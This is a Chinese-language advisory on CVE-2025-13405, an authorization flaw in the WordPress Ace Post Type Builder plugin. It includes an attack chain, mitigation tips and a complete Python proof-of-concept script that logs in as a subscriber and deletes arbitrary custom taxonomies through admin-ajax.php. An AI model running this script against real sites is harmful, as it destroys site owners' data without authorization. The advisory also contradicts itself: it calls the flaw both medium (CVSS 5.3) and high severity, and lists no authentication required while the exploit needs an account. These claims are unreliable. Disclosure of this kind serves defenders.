CVE-2025-13405 WordPress Ace Post Type Builder插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-13405

漏洞类型

权限绕过/授权验证缺失

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ace Post Type Builder WordPress Plugin

漏洞概述

CVE-2025-13405是WordPress的Ace Post Type Builder插件中的一个高危安全漏洞。该插件主要用于帮助用户创建自定义文章类型和分类法。在1.9及以下所有版本中，由于cptb_delete_custom_taxonomy()函数缺少适当的权限验证机制，导致任何已认证用户（包括最低权限的Subscriber订阅者）都可以调用该函数删除任意的自定义分类法。此漏洞属于OWASP Top 10中的Broken Authorization（失效的访问控制）类别，攻击者可以利用此漏洞删除网站的关键自定义分类结构，可能导致业务中断、数据丢失或网站功能异常。由于攻击无需特殊权限且利用简单，建议所有使用该插件的用户立即采取修复措施。

技术细节

该漏洞的根本原因在于WordPress插件的cptb_delete_custom_taxonomy()函数未进行权限检查。在正常的WordPress插件开发中，删除自定义分类法的操作应当仅限管理员角色执行，开发者通常会使用current_user_can('manage_categories')或类似的管理员权限检查来保护此类敏感功能。然而，该插件直接暴露了删除接口，允许任何已认证用户调用。攻击者只需构造一个POST请求，指定要删除的分类法名称，即可触发删除操作。由于该函数直接操作WordPress数据库中的wp_terms、wp_term_taxonomy等核心表，删除操作会级联删除所有关联的术语和关系数据，造成不可逆的破坏。攻击者可以通过枚举网站现有的自定义分类法名称来精准删除关键业务分类。

攻击链分析

STEP 1

步骤1

攻击者获取目标WordPress网站的一个有效用户账户（最低Subscriber权限即可）

STEP 2

步骤2

攻击者登录WordPress获取认证会话Cookie

STEP 3

步骤3

攻击者向/wp-admin/admin-ajax.php发送POST请求，action参数设为cptb_delete_custom_taxonomy

STEP 4

步骤4

攻击者在请求中指定taxonomy_name参数为目标分类法名称

STEP 5

步骤5

服务器端cptb_delete_custom_taxonomy()函数直接执行删除操作，无权限验证

STEP 6

步骤6

自定义分类法及其所有关联的术语、关系数据被从数据库中永久删除

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urljoin

# CVE-2025-13405 PoC - Ace Post Type Builder Unauthorized Taxonomy Deletion
# Affected: Ace Post Type Builder <= 1.9

def delete_custom_taxonomy(target_url, taxonomy_name, username, password):
    """
    Exploit function to delete arbitrary custom taxonomies
    
    Args:
        target_url: Target WordPress site URL
        taxonomy_name: Name of the taxonomy to delete
        username: WordPress subscriber account username
        password: WordPress subscriber account password
    """
    # WordPress login to get authentication cookie
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    
    session = requests.Session()
    login_response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print('[-] Login failed')
        return False
    
    print('[+] Login successful')
    
    # Delete custom taxonomy via AJAX action
    delete_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    delete_data = {
        'action': 'cptb_delete_custom_taxonomy',
        'taxonomy_name': taxonomy_name
    }
    
    response = session.post(delete_url, data=delete_data)
    
    if response.status_code == 200:
        print(f'[+] Taxonomy "{taxonomy_name}" deletion request sent')
        return True
    else:
        print('[-] Request failed')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 5:
        print('Usage: python cve-2025-13405.py <target_url> <taxonomy_name> <username> <password>')
        sys.exit(1)
    
    target = sys.argv[1]
    taxonomy = sys.argv[2]
    user = sys.argv[3]
    pwd = sys.argv[4]
    
    delete_custom_taxonomy(target, taxonomy, user, pwd)

影响范围

Ace Post Type Builder <= 1.9

防御指南

临时缓解措施

如果无法立即升级插件，可临时采取以下措施：1) 限制新用户注册功能，防止攻击者获取订阅者账户；2) 监控wp_term_taxonomy和wp_terms表的异常删除操作；3) 对数据库进行备份以便恢复；4) 考虑暂时禁用该插件直到完成安全更新。